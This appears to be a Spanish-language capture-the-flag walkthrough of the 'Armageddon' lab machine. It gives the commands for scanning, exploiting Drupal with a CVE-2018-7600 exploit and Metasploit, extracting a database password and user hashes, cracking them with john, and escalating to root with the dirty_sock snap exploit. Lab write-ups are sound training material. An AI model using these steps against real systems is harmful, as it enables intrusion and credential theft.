Armageddon

Armageddon


CyberSecLabs Linux

nmap -sC -sV -O -p- -oA armageddon 10.129.182.137

nmap -sU -O -p- -oA armageddon-udp 10.129.182.137

Nos dirigimos a la pagina web http:10.129.182.137

ssh_command.

Es una pagina en Drupal 7

ssh_command.

Iniciamos metasploit y hacemos un search drupal

msf6> search drupal

msf6>use 1

msf6>set LHOST tun0

msf6>set RHOST 10.129.182.137

msf6> run

ssh_command.

https://github.com/pimps/CVE-2018-7600

python3 drupal7-CVE-2018-7600.py http://10.129.182.137/ -c ‘cat sites/default/settings’

ssh_command.

Conseguimos las credenciales

ssh_command.

mysql -udrupaluser -pCQHEy@9M*m23gBVj -D drupal -e ‘select name,pass from users;’

ssh_command.

Copiamos el hash a un archivo llamado armageddon_hash

john armageddon_hash

ssh_command.

Adquirimos el password

ssh_command.

ssh brucetherealadmin@10.129.182.137

https://github.com/initstring/dirty_sock/

ssh_command.

sudo /usr/bin/snap install — devmode new.snap

su dirty_sock

sudo -i

Introducimos la contrasena de nuevo:

dirty_sock

ssh_command.

© 2025 Cu3rv0x